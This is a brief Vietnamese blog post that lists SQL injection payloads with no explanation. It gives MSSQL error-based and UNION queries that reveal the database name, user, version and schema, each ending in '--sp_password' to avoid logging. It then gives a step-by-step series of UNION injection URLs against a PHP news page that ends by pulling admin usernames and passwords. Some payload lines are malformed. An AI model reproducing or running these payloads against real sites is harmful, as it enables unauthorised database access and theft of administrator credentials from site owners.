sql inject và php inject
or 1=1 and 1=convert(int,db_name())--sp_passwordor 1=1 and 1=convert(int,system_user)--sp_password
or 1=1 and 1=convert(int,@@version)--sp_password
or 1=1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--sp_password
or 1=1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('REFERENTIAL_CONSTRAINTS')--sp_password
or 1=1 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='REFERENTIAL_CONSTRAINTS'--sp_password
[LINK].php?site=bantin&id=-1 union select from 0 admin/*
[LINK].php?site=bantin&id=-1 union select from 0 where admin*/
[LINK].php?site=bantin&id=-1 union select from 0,1 admin/*
.....................
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11,12 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11,12,13 admin/*
[LINK].php?site=bantin&id=-1+union+select+0,1,2,concat(user,char(32),pass),4,5,6,7,8,9,10,11,12,13+from+admin/*
được đăng bởi Toi La Ai @ 21:11
0 Nhận xét:
Đăng nhận xét
Đăng ký Đăng Nhận xét [Atom]
<< Trang chủ